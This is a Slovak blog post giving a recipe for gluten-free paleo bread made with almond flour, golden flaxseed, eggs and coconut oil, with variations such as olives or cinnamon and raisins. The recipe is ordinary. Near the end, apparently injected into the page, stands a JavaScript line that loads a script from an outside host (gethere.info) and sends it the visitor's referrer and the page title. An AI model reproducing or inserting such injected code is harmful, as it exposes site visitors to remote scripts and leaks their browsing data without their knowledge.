Od svojich trinástich rokov nejem pečivo, no minulý utorok som spravila výnimku a dala som si do rúry opiecť hrianku z celoražného chleba. Plná očakávania som zaborila zuby do chrumkavej kôrky, ale pocit uspokojenia sa nedostavil. Moje chuťové bunky sa za tie roky tak odnaučili rozpoznávať chlieb, že mi jeho konzumácia vôbec nesedela. Tie chute si už dávno nespájam s pôžitkom, ale tento zážitok ma nakopol k tomu, aby som vytvorila niečo originálne. Túžila som po konzistencii pečiva, no z tradičných surovín by to nebolo to pravé orechové ;)
Vedela som že to musí byt zdravé, jednoduché, konzistenciou pripomínajúce klasické cesto a hlavne zo surovín, ktorým aktuálne holdujem. Do 30 minút bol tento zázrak upečený a naozaj to stálo za to! Chuťovo bol veľmi jemný, čiže sa dá jesť aj na sladko. A navyše sa dokonale krája. Nedrolí sa, nerozpadáva a ani sa na nožíku netvoria otravné žmolky, ako je zvykom pri krájaní klasického bochníka ostatnými členmi mojej rodiny.
No späť k receptíku :). V predchádzajúcich článkoch Vám Kikush básnila o mandliach a vajíčkach (pamäť si môžete osviežiť tu a tu) a ja som ju doplnila o informácie o kokosovom oleji. Všetky spomínané zdravé suroviny tvoria základ dnešného Paleo chlebíka. Jedna nám tu ale chýba a tou je ľanové semiačko.
Zlatý ľan má nie nadarmo prívlastok zlatý, je to totižto nutričná bomba.
Bezkonkurenčný kráľ rastlinných omega 3, bohatý na vlákninu a ostatné super živiny, o ktorých sa dočítate v sobotňajšom článku.
Ingrediencie: (na chlebík vo forme 20x10cm)
- 100g mandľovej múky
- 45-50g zlatého ľanového semiačka (samozrejme môžeme použiť aj hnedý ľan, avšak potom musíme rátať s tmavším chlebíkom)
- 1 ½ CL sódy bikarbóny (aj 1ČL prášku do pečiva môže byť)
- ¼ CL soli
- 5 stredne veľkých vajíčok (celých)
- 4PL rozpusteného kokosového oleja*
- 1 PL medu
- 1PL nepasterizovaného jablčného octu
Postup:
- Najskôr si čerstvo pomelieme ľanové semiačka v kávovom mlynčeku.
- Všetky suché prísady vrátane čerstvo pomletého ľanu spojíme v miske.
- Pomaly si rozpustíme kokosový olej.
- Zmiešame všetky ostatné tekuté ingrediencie a postupne pridávame kokosový olej. Pozor, aby Ste nepridali kokosový olej rovno z horúceho hrnca, riskujete tým vznik praženice.
- Spojíme suché prísady s tekutými a nalejeme do vopred vymastenej formy na pečenie. Použila som klasickú obdĺžnikovú formu v menšom rozmere 20 x 10cm. Dá sa použiť aj väčšia, ale potom Váš chlebík nedosiahne požadovanú výšku.
- Pečieme 30 minút v predhriatej rúre pri 180°C.
- Chlebík sa môže krájať aj konzumovať hneď teplý, ja som ho ale radšej nechala 15 minút vyklopený na rošte.
Variácie:
*Kokosový olej môžeme nahradiť výraznejším extra panenským olivovým olejom. Kokosový olej je chuťovo neutrálnejší a vhodný, ak by sme chceli chlebík jesť nasladko.
Olivový olej a čierne olivy – Nahraďte kokosový olej za olivový a pridajte do cesta pár nakrájaných čiernych olív.
Škorica s hrozienkami – Pridajte do suchých prísad čajovú lyžičku mletej škorice a do hotového cesta malú hrsť hrozienok alebo iného sušeného ovocia.
Sušené paradajky s tymiánom – Nakrájajte si sušené paradajky na tenké plátky a pridajte spolu s ½ CL sušeného alebo 1 CL čerstvého tymiánu rovno do cesta.
Vlašské orechy s restovanou cibuľkou – Orestujte si malú, na plátky nakrájanú cibuľu a pridajte spolu s polámanými vlašskými orechmi do cesta.
Bezlepkové – Paleo – Vegetariánske – bez pridaného cukru – bez sóje – nízkosacharidové
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
Leave a Reply
You must be logged in to post a comment.